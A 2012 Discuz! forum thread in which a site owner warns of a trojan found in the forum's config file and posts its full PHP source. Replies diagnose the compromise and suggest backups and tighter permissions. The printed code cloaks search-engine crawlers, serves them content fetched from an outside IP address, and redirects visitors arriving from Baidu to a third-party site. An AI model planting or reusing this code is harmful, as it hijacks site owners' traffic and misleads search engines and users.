Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

DZX2 可能存在新的安全问题

[复制链接]
enhand 发表于 2012-4-19 21:47:00 | 显示全部楼层 |阅读模式
网站一直很正常,今天发现被人注入如下代码,请大家共同警惕:
  1. <?php^M
  2. /*
  3. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);^M
  4. ini_set('display_errors',0);^M
  5. ^M
  6. $spider_arr = array(^M
  7.         'baiduspider',^M
  8.         'baiduspider/2.0',^M
  9.         'baiducustomer',^M
  10.         'baidu-thumbnail',^M
  11.         'baiduspider-mobile-gate',^M
  12.         'baiduspider-mobile-gate',^M
  13.         'baidu-transcoder/1.0.6.0',^M
  14. ^M
  15.         'googlebot/2.1',^M
  16.         'googlebot-image/1.0',^M
  17.         'feedfetcher-google',^M
  18.         'mediapartners-google',^M
  19.         'adsbot-google',^M
  20.         'googlebot-mobile/2.1',^M
  21.         'googlefriendconnect/1.0',^M
  22. ^M
  23.         'sosospider',^M
  24.         'sosoblogspider',^M
  25.         'sosoimagespider',^M
  26. ^M
  27.         'sogou web robot',^M
  28.         'sogou web spider/3.0',^M
  29.         'sogou web spider/4.0',^M
  30.         'sogou head spider/3.0',^M
  31.         'sogou-test-spider/4.0',^M
  32.         'sogou orion spider/4.0',^M
  33. );^M
  34. ^M
  35. 。。。。。。。。。。。。。。
复制代码
m.king 发表于 2012-4-19 22:19:34 | 显示全部楼层
你站点被挂马了吧,你看下你网站是否有 phpmyadmin 这种漏洞王,自己扫下服务器,X2暂时没发现啥致命的漏洞。
回复

使用道具 举报

 楼主| enhand 发表于 2012-4-19 22:24:53 | 显示全部楼层
m.king 发表于 2012-4-19 22:19
你站点被挂马了吧,你看下你网站是否有 phpmyadmin 这种漏洞王,自己扫下服务器,X2暂时没发现啥致命的漏洞 ...

十分感谢,确实是一种马,只是修改了config文件。
回复

使用道具 举报

www.cqxyk.com 发表于 2012-4-19 22:37:06 | 显示全部楼层
所以得多备份,常备份就不怕马了。我之前常被人攻击的!因为是做金融服务。

定位:信用卡、贷款;
案例:http://www.zgxykw.com 中国信用卡网
回复

使用道具 举报

 楼主| enhand 发表于 2012-4-21 07:05:35 | 显示全部楼层
经历这件事情后,发现百度、google对网站几乎没有什么影响,20多天了流量、人数基本上没有变化。
回复

使用道具 举报

 楼主| enhand 发表于 2012-4-21 07:07:28 | 显示全部楼层
  1. <?php

  2. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);

  3. ini_set('display_errors',0);



  4. $spider_arr = array(

  5. 'baiduspider',

  6. 'baiduspider/2.0',

  7. 'baiducustomer',

  8. 'baidu-thumbnail',

  9. 'baiduspider-mobile-gate',

  10. 'baiduspider-mobile-gate',

  11. 'baidu-transcoder/1.0.6.0',



  12. 'googlebot/2.1',

  13. 'googlebot-image/1.0',

  14. 'feedfetcher-google',

  15. 'mediapartners-google',

  16. 'adsbot-google',

  17. 'googlebot-mobile/2.1',

  18. 'googlefriendconnect/1.0',



  19. 'sosospider',

  20. 'sosoblogspider',

  21. 'sosoimagespider',



  22. 'sogou web robot',

  23. 'sogou web spider/3.0',

  24. 'sogou web spider/4.0',

  25. 'sogou head spider/3.0',

  26. 'sogou-test-spider/4.0',

  27. 'sogou orion spider/4.0',

  28. );



  29. $not_spider_ip_arr = array(

  30. "222.77.187.33",

  31. "125.90.88.96"

  32. );



  33. $ref_arr = array(

  34.     'baidu.com',

  35.     'google.com'

  36. );



  37. $agent = $_SERVER['HTTP_USER_AGENT'];

  38. $rip = $_SERVER["REMOTE_ADDR"];

  39. $referer = $_SERVER["HTTP_REFERER"];

  40. $spider = false;

  41. foreach($spider_arr as $_spider) {

  42. if(stripos($agent,$_spider) !== false) {

  43. $spider = true;

  44. break;

  45. }

  46. }



  47. if(in_array($rip,$not_spider_ip_arr)) {

  48. $spider = false;

  49. }



  50. $ref = false;

  51. foreach($ref_arr as $_ref) {

  52. if(stripos($referer,$_ref) !== false) {

  53. $ref = true;

  54. break;

  55. }

  56. }



  57. $query_string=$_SERVER["HTTP_REFERER"];

  58. function isSpider($v)

  59. {

  60. $spiders=array("baidu.com","google.com","soso","sogou");

  61. $i=0;

  62. foreach ($spiders as $i => $value) {

  63. if(stristr($v,$spiders[$i])){return true;}

  64. }

  65. return false;

  66. }

  67. if(isSpider($_SERVER['HTTP_REFERER']))

  68. {

  69.       

  70. if(stristr($_SERVER["HTTP_REFERER"],'baidu')) {

  71. Header("Location: ".'http://www.puer.com.tw/ec/wap/piao.htm?'.$_SERVER['SERVER_NAME']);

  72. exit;

  73. }



  74. }





  75. if($spider) {

  76. echo file_get_contents('http://175.6.1.200:8080/ok/piao.php');

  77. exit;

  78. }

  79. ?>

  80. <?php

  81. if (function_exists("ini_get") && function_exists("ini_set")) {

  82. ini_set("display_errors",1);

  83. ini_set("error_reporting",E_ALL & ~E_NOTICE);

  84. }

  85. ?>

复制代码
完整的木马如下,不清楚怎么被挂上去的。
回复

使用道具 举报

乐七 发表于 2012-4-21 09:57:30 | 显示全部楼层
enhand 发表于 2012-4-21 07:07
完整的木马如下,不清楚怎么被挂上去的。

我7.2的一个论坛也被挂过这个。
回复

使用道具 举报

 楼主| enhand 发表于 2012-4-21 22:58:16 | 显示全部楼层
这种东西写的还挺巧妙地,论坛安装完毕就应该降低 config目录的读写权限比较好。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-16 15:03 , Processed in 0.036674 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表